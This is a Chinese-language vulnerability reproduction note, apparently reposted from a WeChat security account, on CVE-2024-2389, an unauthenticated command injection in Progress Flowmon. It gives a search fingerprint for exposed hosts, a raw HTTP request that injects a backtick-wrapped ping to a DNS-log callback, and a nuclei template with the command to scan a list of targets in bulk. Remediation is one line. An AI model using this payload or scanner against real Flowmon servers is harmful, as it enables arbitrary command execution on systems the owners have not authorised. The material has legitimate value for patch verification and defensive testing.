免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
Progress Flowmon 11.X 12.x版本
03
—
漏洞描述
Progress Flowmon 是一个网络性能监控工具平台。2024年4月互联网上披露其存在前台命令注入漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。
04
—
body="Flowmon-Web-Interface"
05
—
漏洞复现
向靶场发送如下数据包,其中ping+dnslog地址需要修改成自己dnslog地址
GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
漏洞复现成功
06
—
批量扫描 poc
nuclei poc文件内容如下
id: CVE-2024-2389info:name: Progress Flowmon 命令注入漏洞author: fgzseverity: highdescription: |Progress Flowmon 是一个网络性能监控工具平台。2024年4月互联网上披露其存在前台命令注入漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。reference:https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerabilitymetadata:verified: true: body="Flowmon-Web-Interface"tags: cve,cve2024,rcehttp:method: GETpath:"{{BaseURL}}/service.pdfs/confluence?lang=en&file=`ping+{{interactsh-url}}`"matchers:type: dsldsl:contains(interactsh_protocol, "dns")condition: and
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-2389.yaml -l data1.txt
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-2389
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论